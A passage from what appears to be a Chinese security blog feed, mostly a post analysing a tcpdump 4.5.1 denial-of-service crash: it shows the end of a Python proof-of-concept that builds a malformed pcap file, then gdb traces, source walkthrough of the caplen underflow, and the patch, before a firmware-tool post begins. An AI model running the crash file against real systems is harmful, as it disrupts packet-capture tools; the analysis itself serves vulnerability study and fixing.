buffer     +=  &quot;xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n&apos;, &apos;\x00\x00\x00\x00&quot;</span><br><span class="line">    buffer     +=  &apos;\x00\x00\x00\x00\x01\x03\x03\x04&apos;</span><br><span class="line">    with open(&apos;crash&apos;, &apos;w+b&apos;) as file:</span><br><span class="line">        file.write(buffer)</span><br><span class="line">    try:</span><br><span class="line">        call(split(command))</span><br><span class="line">        print(&quot;Exploit successful!             &quot;)</span><br><span class="line">    except:</span><br><span class="line">        print(&quot;Error: Something has gone wrong!&quot;)</span><br><span class="line">def main():</span><br><span class="line">    print(&quot;Author:   David Silveiro                           &quot;)</span><br><span class="line">    print(&quot;   tcpdump version 4.5.1 Access Violation Crash    &quot;)</span><br><span class="line">    sleep(2)</span><br><span class="line">    crash()</span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure><h2 id="四、崩溃分析"><a href="#四、崩溃分析" class="headerlink" title="四、崩溃分析"></a>四、崩溃分析</h2><h3 id="1-pcap包格式"><a href="#1-pcap包格式" class="headerlink" title="1.pcap包格式"></a>1.pcap包格式</h3><p>首先来分析一下pcap包的格式，首先是pcap文件头的内容，在.h有所定义，这里将结构体以及对应变量含义都列出来。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">struct pcap_file_header &#123;</span><br><span class="line">        bpf_u_int32 magic;</span><br><span class="line">        u_short version_major;</span><br><span class="line">        u_short version_minor;</span><br><span class="line">        bpf_int32 thiszone;     /* gmt to local correction */</span><br><span class="line">        bpf_u_int32 sigfigs;    /* accuracy of timestamps */</span><br><span class="line">        bpf_u_int32 snaplen;    /* max length saved portion of each pkt */</span><br><span class="line">        bpf_u_int32 linktype;   /* data link type (LINKTYPE_*) */</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></p><p>看一下各字段的含义：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> magic：   4字节 pcap文件标识 目前为“d4 c3 b2 a1”</span><br><span class="line"> major：   2字节 主版本号     #define PCAP_VERSION_MAJOR 2</span><br><span class="line"> minor：   2字节 次版本号     #define PCAP_VERSION_MINOR 4</span><br><span class="line"> thiszone：4字节 时区修正     并未使用，目前全为0</span><br><span class="line"> sigfigs： 4字节 精确时间戳   并未使用，目前全为0</span><br><span class="line"> snaplen： 4字节 抓包最大长度 如果要抓全，设为0x0000ffff（65535），</span><br><span class="line">          tcpdump -s 0就是设置这个参数，缺省为68字节</span><br><span class="line"> linktype：4字节 链路类型    一般都是1：ethernet</span><br><span class="line"></span><br><span class="line">struct pcap_pkthdr &#123;</span><br><span class="line">        struct timeval ts;      /* time stamp */</span><br><span class="line">        bpf_u_int32 caplen;     /* length of portion present */</span><br><span class="line">        bpf_u_int32 len;        /* length this packet (off wire) */</span><br><span class="line">&#125;;</span><br><span class="line">struct timeval &#123;</span><br><span class="line">        long            tv_sec;         /* seconds (XXX should be time_t) */</span><br><span class="line">        suseconds_t     tv_usec;        /* and microseconds */</span><br><span class="line">&#125;;</span><br><span class="line"> ts：    8字节 抓包时间 4字节表示秒数，4字节表示微秒数</span><br><span class="line"> caplen：4字节 保存下来的包长度（最多是snaplen，比如68字节）</span><br><span class="line"> len：   4字节 数据包的真实长度，如果文件中保存的不是完整数据包，可能比caplen大</span><br></pre></td></tr></table></figure></p><p>其中len变量是值得关注的，因为在crash文件中，对应len变量的值为00 3C 9C 37<br>这是一个很大的值，读取出来就是379C3C00，数非常大，实际上在wireshark中打开这个crash文件，就会报错，会提示这个数据包的长度已经超过了范围，而换算出来的长度就是379C3C00，这是触发漏洞的关键。</p><h3 id="2-gdb调试"><a href="#2-gdb调试" class="headerlink" title="2.gdb调试"></a>2.gdb调试</h3><p>首先通过gdb运行tcpdump，用-r参数打开poc生成的crash，tcp崩溃，到达漏洞触发位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">1.Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">2.[----------------------------------registers-----------------------------------]</span><br><span class="line">3.EAX: 0x1</span><br><span class="line">4.EBX: 0x81e33bd --&gt; 0x0</span><br><span class="line">5.ECX: 0x2e (&apos;.&apos;)</span><br><span class="line">6.EDX: 0x0</span><br><span class="line">7.ESI: 0xbfffe201 (&apos;.&apos; &lt;repeats 14 times&gt;)</span><br><span class="line">8.EDI: 0xbfffe1db --&gt; 0x30303000 (&apos;&apos;)</span><br><span class="line">9.EBP: 0x10621</span><br><span class="line">10.ESP: 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:   mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">11.EIP: 0x8053c6a (&lt;hex_and_ascii_print_with_offset+106&gt;:  movzx  edx,BYTE PTR [ebx+ebp*2+0x1])</span><br><span class="line">12.EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)</span><br><span class="line">13.[-------------------------------------code-------------------------------------]</span><br><span class="line">14.   0x8053c5d &lt;hex_and_ascii_print_with_offset+93&gt;:      je     0x8053d40 &lt;hex_and_ascii_print_with_offset+320&gt;</span><br><span class="line">15.   0x8053c63 &lt;hex_and_ascii_print_with_offset+99&gt;:      mov    ebx,DWORD PTR [esp+0x18]</span><br><span class="line">16.   0x8053c67 &lt;hex_and_ascii_print_with_offset+103&gt;:     sub    esp,0x4</span><br><span class="line">17.=&gt; 0x8053c6a &lt;hex_and_ascii_print_with_offset+106&gt;:     movzx  edx,BYTE PTR [ebx+ebp*2+0x1]</span><br><span class="line">18.   0x8053c6f &lt;hex_and_ascii_print_with_offset+111&gt;:     movzx  ecx,BYTE PTR [ebx+ebp*2]</span><br><span class="line">19.   0x8053c73 &lt;hex_and_ascii_print_with_offset+115&gt;:     push   edx</span><br><span class="line">20.   0x8053c74 &lt;hex_and_ascii_print_with_offset+116&gt;:     mov    ebx,edx</span><br><span class="line">21.   0x8053c76 &lt;hex_and_ascii_print_with_offset+118&gt;:     mov    DWORD PTR [esp+0x18],edx</span><br><span class="line">22.[------------------------------------stack-------------------------------------]</span><br><span class="line">23.0000| 0xbfffe1ac --&gt; 0x8053caa (&lt;hex_and_ascii_print_with_offset+170&gt;:  mov    ecx,DWORD PTR [esp+0xc])</span><br><span class="line">24.0004| 0xbfffe1b0 --&gt; 0xb7fff000 --&gt; 0x23f3c</span><br><span class="line">25.0008| 0xbfffe1b4 --&gt; 0x1</span><br><span class="line">26.0012| 0xbfffe1b8 --&gt; 0x2f5967 (&apos;gY/&apos;)</span><br><span class="line">27.0016| 0xbfffe1bc --&gt; 0x0</span><br><span class="line">28.0020| 0xbfffe1c0 --&gt; 0x0</span><br><span class="line">29.0024| 0xbfffe1c4 --&gt; 0x7ffffff9</span><br><span class="line">30.0028| 0xbfffe1c8 --&gt; 0x81e33bd --&gt; 0x0</span><br><span class="line">31.[------------------------------------------------------------------------------]</span><br><span class="line">32.Legend: code, data, rodata, value</span><br><span class="line">33.Stopped reason: SIGSEGV</span><br><span class="line">34.hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">35.    length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">36.91                      s2 = *cp++;</span><br></pre></td></tr></table></figure></p><p>从崩溃信息来看，出错位置为s2 = <em>cp++;崩溃原因为SIGSEGV，即进程执行了一段无效的内存引用或发生段错误。可以看到，问题出现在./print-ascii.c:91，而且此时指针读取[ebx+ebp</em>2+0x1]的内容，可能是越界读取造成的崩溃。<br>再结合源码信息可知，指针cp在自加的过程中访问到了一个没有权限访问的地址，因为这是写在一个while循环里，也就是是说nshorts的值偏大，再看nshorts怎么来的，由此nshorts = length / sizeof(u_short);可知，可能是函数传入的参数length没有控制大小导致，因此目标就是追踪length是如何传入的。<br>我们通过bt回溯一下调用情况。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1.gdb-peda$ bt</span><br><span class="line">2.#0  hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">3.    length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">4.#1  0x08053e26 in hex_and_ascii_print (ident=0x80c04af &quot;\n\t&quot;, cp=0x81e33bd &quot;&quot;, length=0xfffffff3) at ./print-ascii.c:127</span><br><span class="line">5.#2  0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 &lt;Gndo&gt;, h=0xbfffe40c, p=&lt;optimized out&gt;) at ./print-802_15_4.c:180</span><br><span class="line">6.#3  0x080a0aea in print_packet (user=0xbfffe4dc &quot; \023\036\b\300\034\005\b\001&quot;, h=0xbfffe40c, sp=0x81e33a8 &quot;@\377&quot;)</span><br><span class="line">7.    at ./tcpdump.c:1950</span><br><span class="line">8.#4  0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">9.#5  0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">10.#6  0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569</span><br><span class="line">11.#7  0xb7de9637 in __libc_start_main (main=0x804a4c0 &lt;main&gt;, argc=0x3, argv=0xbffff6c4, init=0x80b1230 &lt;__libc_csu_init&gt;,</span><br><span class="line">12.    fini=0x80b1290 &lt;__libc_csu_fini&gt;, rtld_fini=0xb7fea880 &lt;_dl_fini&gt;, stack_end=0xbffff6bc) at ../csu/libc-start.c:291</span><br><span class="line">13.#8  0x0804c245 in _start ()</span><br></pre></td></tr></table></figure></p><p>函数调用流程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pcap_loop</span><br><span class="line">  |----print_packet</span><br><span class="line">                 |-----hex_and_ascii_print</span><br><span class="line">                                |--------  hex_and_ascii_print_with_offset</span><br></pre></td></tr></table></figure></p><p>由此可见，从main函数开始了一连串函数调用，git源码下来看看。<br>tcpdump.c找到pcap_loop调用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1.    do &#123;</span><br><span class="line">2.        status = pcap_loop(pd, cnt, callback, pcap_userdata);</span><br><span class="line">3.        if (WFileName == NULL) &#123;</span><br><span class="line">4.            /*</span><br><span class="line">5.             * We&apos;re printing packets.  Flush the printed output,</span><br><span class="line">6.             * so it doesn&apos;t get intermingled with error output.</span><br><span class="line">7.             */</span><br><span class="line">8.            if (status == -2) &#123;</span><br><span class="line">9.                /*</span><br><span class="line">10.                 * We got interrupted, so perhaps we didn&apos;t</span><br><span class="line">11.                 * manage to finish a line we were printing.</span><br><span class="line">12.                 * Print an extra newline, just in case.</span><br><span class="line">13.                 */</span><br><span class="line">14.                putchar(&apos;n&apos;);</span><br><span class="line">15.            &#125;</span><br><span class="line">16.            (void)fflush(stdout);</span><br><span class="line">17.        &#125;</span><br></pre></td></tr></table></figure></p><p>设置断点之后查看一下该函数的执行结果</p><p>pcap_loop通过callback指向print_packet,来看一下它的源码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">1.static void</span><br><span class="line">2.print_packet(u_char *user, const struct pcap_pkthdr *h, const u_char *sp)</span><br><span class="line">3.&#123;</span><br><span class="line">4.    struct print_info *print_info;</span><br><span class="line">5.    u_int hdrlen;</span><br><span class="line">6.    ++packets_captured;</span><br><span class="line">7.    ++infodelay;</span><br><span class="line">8.    ts_print(&amp;h-&gt;ts);</span><br><span class="line">9.    print_info = (struct print_info *)user;</span><br><span class="line">10.    /*</span><br><span class="line">11.     * Some printers want to check that they&apos;re not walking off the</span><br><span class="line">12.     * end of the packet.</span><br><span class="line">13.     * Rather than pass it all the way down, we set this global.</span><br><span class="line">14.     */</span><br><span class="line">15.    snapend = sp + h-&gt;caplen;</span><br><span class="line">16.        if(print_info-&gt;ndo_type) &#123;</span><br><span class="line">17.                hdrlen = (*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo, h, sp);&lt;====</span><br><span class="line">18.        &#125; else &#123;</span><br><span class="line">19.                hdrlen = (*print_info-&gt;p.printer)(h, sp);</span><br><span class="line">20.        &#125;</span><br><span class="line">21.    putchar(&apos;n&apos;);</span><br><span class="line">22.    --infodelay;</span><br><span class="line">23.    if (infoprint)</span><br><span class="line">24.        info(0);&#125;</span><br></pre></td></tr></table></figure></p><p>同样设置断点看该函数是如何调用执行的</p><p>这是我们可以根据call的信息，计算出调用的函数名</p><p>其中(*print_info-&gt;p.ndo_printer)(print_info-&gt;ndo,h,sp)指向ieee802_15_4_if_print</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line">25.u_int</span><br><span class="line">26.ieee802_15_4_if_print(struct netdissect_options *ndo,</span><br><span class="line">27.const struct pcap_pkthdr *h, const u_char *p)</span><br><span class="line">28.&#123;</span><br><span class="line">29.printf(&quot;address : %x\n&quot;,p);</span><br><span class="line">30.u_int caplen = h-&gt;caplen; //传入的caplen，赋值给无符号整形变量caplen,且该值为8</span><br><span class="line">31.int hdrlen;</span><br><span class="line">32.u_int16_t fc;</span><br><span class="line">33.u_int8_t seq;</span><br><span class="line">34.if (caplen &lt; 3) &#123; //不满足</span><br><span class="line">35.ND_PRINT((ndo, &quot;[|802.15.4] %x&quot;, caplen));</span><br><span class="line">36.return caplen;</span><br><span class="line">37.&#125;</span><br><span class="line">38.fc = EXTRACT_LE_16BITS(p);</span><br><span class="line">39.hdrlen = extract_header_length(fc);</span><br><span class="line">40.seq = EXTRACT_LE_8BITS(p + 2);</span><br><span class="line">41.p += 3;</span><br><span class="line">42.caplen -= 3;//此时caplen = 5</span><br><span class="line">43.ND_PRINT((ndo,&quot;IEEE 802.15.4 %s packet &quot;, ftypes[fc &amp; 0x7]));</span><br><span class="line">44.if (vflag)</span><br><span class="line">45.ND_PRINT((ndo,&quot;seq %02x &quot;, seq));</span><br><span class="line">46.if (hdrlen == -1) &#123;</span><br><span class="line">47.ND_PRINT((ndo,&quot;malformed! &quot;));</span><br><span class="line">48.return caplen;</span><br><span class="line">49.&#125;</span><br><span class="line">50.if (!vflag) &#123;</span><br><span class="line">51.p+= hdrlen;</span><br><span class="line">52.caplen -= hdrlen;</span><br><span class="line">53.&#125; else &#123;</span><br><span class="line">54.u_int16_t panid = 0;</span><br><span class="line">55.switch ((fc &gt;&gt; 10) &amp; 0x3) &#123;</span><br><span class="line">56.case 0x00:</span><br><span class="line">57.ND_PRINT((ndo,&quot;none &quot;));</span><br><span class="line">58.break;</span><br><span class="line">59.case 0x01:</span><br><span class="line">60.ND_PRINT((ndo,&quot;reserved destination addressing mode&quot;));</span><br><span class="line">61.return 0;</span><br><span class="line">62.case 0x02:</span><br><span class="line">63.panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">64.p += 2;</span><br><span class="line">65.ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">66.p += 2;</span><br><span class="line">67.break;</span><br><span class="line">68.case 0x03:</span><br><span class="line">69.panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">70.p += 2;</span><br><span class="line">71.ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p)));</span><br><span class="line">72.p += 8;</span><br><span class="line">73.break;</span><br><span class="line">74.&#125;</span><br><span class="line">75.ND_PRINT((ndo,&quot;&lt; &quot;);</span><br><span class="line">76.switch ((fc &gt;&gt; 14) &amp; 0x3) &#123;</span><br><span class="line">77.case 0x00:</span><br><span class="line">78.ND_PRINT((ndo,&quot;none &quot;));</span><br><span class="line">79.break;</span><br><span class="line">80.case 0x01:</span><br><span class="line">81.ND_PRINT((ndo,&quot;reserved source addressing mode&quot;));</span><br><span class="line">82.return 0;</span><br><span class="line">83.case 0x02:</span><br><span class="line">84.if (!(fc &amp; (1 &lt;&lt; 6))) &#123;</span><br><span class="line">85.panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">86.p += 2;</span><br><span class="line">87.&#125;</span><br><span class="line">88.ND_PRINT((ndo,&quot;%04x:%04x &quot;, panid, EXTRACT_LE_16BITS(p)));</span><br><span class="line">89.p += 2;</span><br><span class="line">90.break;</span><br><span class="line">91.case 0x03:</span><br><span class="line">92.if (!(fc &amp; (1 &lt;&lt; 6))) &#123;</span><br><span class="line">93.panid = EXTRACT_LE_16BITS(p);</span><br><span class="line">94.p += 2;</span><br><span class="line">95.&#125;</span><br><span class="line">96.ND_PRINT((ndo,&quot;%04x:%s &quot;, panid, le64addr_string(p))));</span><br><span class="line">97.p += 8;</span><br><span class="line">98.break;</span><br><span class="line">99.&#125;</span><br><span class="line">100.caplen -= hdrlen;</span><br><span class="line">101.&#125;</span><br></pre></td></tr></table></figure><p>传入的第二个值是struct pcap_pkthdr *h结构体，函数使用的参数caplen就是结构体中的caplen，不难看出，caplen进行一些加减操作后，没有判断正负，直接丢给了下一个函数使用。<br>直接跟进函数，看看最后赋值情况</p><p>从源码和调试信息可以看到libpcap在处理不正常包时不严谨，导致包的头长度hdrlen竟然大于捕获包长度caplen，并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数，导致caplen==0xfffffff3过长。<br>继续跟进hex_and_asciii_print(ndo_default_print)</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">1.void</span><br><span class="line">2.hex_and_ascii_print(register const char *ident, register const u_char *cp,</span><br><span class="line">3.    register u_int length)</span><br><span class="line">4.&#123;</span><br><span class="line">5.    hex_and_ascii_print_with_offset(ident, cp, length, 0);</span><br><span class="line">6.&#125;</span><br><span class="line"></span><br><span class="line">其中length==0xfffffff3，继续执行</span><br><span class="line">1.void</span><br><span class="line">2.hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,</span><br><span class="line">3.              register u_int oset)</span><br><span class="line">4.&#123;</span><br><span class="line">5.    register u_int i, s;</span><br><span class="line">6.    register int nshorts;</span><br><span class="line">7.</span><br><span class="line">8.    nshorts = (u_int) length / sizeof(u_short);</span><br><span class="line">9.    i = 0;</span><br><span class="line">10.    while (--nshorts &gt;= 0) &#123;</span><br><span class="line">11.        if ((i++ % 8) == 0) &#123;</span><br><span class="line">12.            (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">13.            oset += HEXDUMP_BYTES_PER_LINE;</span><br><span class="line">14.        &#125;</span><br><span class="line">15.        s = *cp++;   &lt;======= 抛出错误位置</span><br><span class="line">16.        (void)printf(&quot; %02x%02x&quot;, s, *cp++);</span><br><span class="line">17.    &#125;</span><br><span class="line">18.    if (length &amp; 1) &#123;</span><br><span class="line">19.        if ((i % 8) == 0)</span><br><span class="line">20.            (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">21.        (void)printf(&quot; %02x&quot;, *cp);</span><br><span class="line">22.    &#125;</span><br><span class="line">nshorts=(u_int) length / sizeof(u_short) =&gt; nshorts=0xfffffff3/2=‭7FFFFFF9‬‬‬‬</span><br></pre></td></tr></table></figure><p>但数据包数据没有这么长，导致了crash。</p><h3 id="3-内存分析"><a href="#3-内存分析" class="headerlink" title="3.内存分析"></a>3.内存分析</h3><p>仔细分析之后发现，通过len判断的这个长度并没有进行控制，如果是自己构造的一个超长len的数据包，则会连续读取到不可估计的值。<br>通过查看epx的值来看一下这个内存到底开辟到什么位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.gdb-peda$ x/10000000x 0x81e33bd</span><br><span class="line">2.0x8203fdd:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">3.0x8203fed:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">4.0x8203ffd:      Cannot access memory at address 0x8204000</span><br></pre></td></tr></table></figure></p><p>可以看到，到达0x 8204000附近的时候，就是无法读取的无效地址了，那么初始值为0x 81e33bd，用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40，因为ebx+ebp*2+0x1一次读取两个字节，那么循环计数器就要除以2，最后结果为0x 10620。<br>来看一下到达拒绝服务位置读取的长度：EBX: 0x81e33bd –&gt; 0x0；EBP: 0x10621；<br>EBP刚好为10621。正是不可读取内存空间的地址，因此造成拒绝服务。</p><h3 id="4-漏洞总结"><a href="#4-漏洞总结" class="headerlink" title="4.漏洞总结"></a>4.漏洞总结</h3><p>总结一下整个漏洞触发过程，首先tcpdump会读取恶意构造的pcap包，在构造pcap包的时候，设置一个超长的数据包长度，tcpdump会根据len的长度去读取保存在内存空间数据包的内容，当引用到不可读取内存位置时，会由于引用不可读指针，造成拒绝服务漏洞。</p><h2 id="五、漏洞修补"><a href="#五、漏洞修补" class="headerlink" title="五、漏洞修补"></a>五、漏洞修补</h2><p>Libpcap依然是apt安装的默认版本，tcpdump使用4.7 .0-bp版本<br>在hex_and_ascii_print_with_offset中增加对caplength的判断<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1.caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;</span><br><span class="line">2.if (length &gt; caplength)</span><br><span class="line">3.    length = caplength;</span><br><span class="line">4.nshorts = length / sizeof(u_short);</span><br><span class="line">5.i = 0;</span><br><span class="line">6.hsp = hexstuff; asp = asciistuff;</span><br><span class="line">7.while (--nshorts &gt;= 0) &#123;</span><br><span class="line">8.    ...</span><br><span class="line">9.&#125;</span><br></pre></td></tr></table></figure></p><p>可以看到执行完caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;，caplength为0，继续执行，可以推出length同样为0，到这里已经不会发生错误了。</p><p>参考<br><a href="https://www.exploit-db.com/exploits/39875/" target="_blank" rel="noopener">exploit-db payload</a><br><a href="https://whereisk0shl.top/post/2016-10-23-1" target="_blank" rel="noopener">WHEREISK0SHL分析博客</a><br><a href="https://github.com/the-tcpdump-group" target="_blank" rel="noopener">libpcap/tcpdump源码</a></p>]]></content>
-      
-      
-      
-    </entry>
-    
-    
-    
-    <entry>
-      <title>小米固件工具mkxqimage</title>
-      <link href="/2019/03/16/%E5%B0%8F%E7%B1%B3%E5%9B%BA%E4%BB%B6%E5%B7%A5%E5%85%B7mkxqimage/"/>
-      <url>/2019/03/16/%E5%B0%8F%E7%B1%B3%E5%9B%BA%E4%BB%B6%E5%B7%A5%E5%85%B7mkxqimage/</url>
-      
-        <content type="html"><![CDATA[<h1 id="小米固件工具mkxqimage"><a href="#小米固件工具mkxqimage" class="headerlink" title="小米固件工具mkxqimage"></a>小米固件工具mkxqimage</h1><p>小米自己改了个打包解包固件的工具，基于 trx 改的（本质上还是 trx 格式），加了 RSA 验证和解包功能，路由系统里自带：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Usage:</span><br><span class="line">mkxqimg [-o outfile] [-p private_key] [-f file] [-f file [-f file [-f file ]]]</span><br><span class="line">        [-x file]</span><br><span class="line">        [-I]</span><br></pre></td></tr></table></figure></p><h2 id="固件解包"><a href="#固件解包" class="headerlink" title="固件解包"></a>固件解包</h2><p>固件工具mkxqimage完成对固件的解包，在解包前先检查Checksum是否正确，然后利用RSA公钥/usr/share/xiaoqiang/public.pem检查RSA签名，这两个步骤通过后，根据[0x0C]的固件类型，以及[0x10]、[0x14]、[0x18]和[0x1C]的4个偏移量拆分固件。</p><h2 id="固件打包"><a href="#固件打包" class="headerlink" title="固件打包"></a>固件打包</h2><p>小米官方在打包固件时用RSA私钥计算出固件的RSA签名，小米路由器下载固件后用RSA公钥来验证RSA签名，有效地防止固件被篡改。</p><h2 id="固件格式"><a href="#固件格式" class="headerlink" title="固件格式"></a><a href="http://www.iptvfans.cn/wiki/index.php/%E5%B0%8F%E7%B1%B3%E8%B7%AF%E7%94%B1%E5%99%A8%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90" target="_blank" rel="noopener">固件格式</a></h2><p>路由固件的格式，基本是基于 openwrt 的 trx 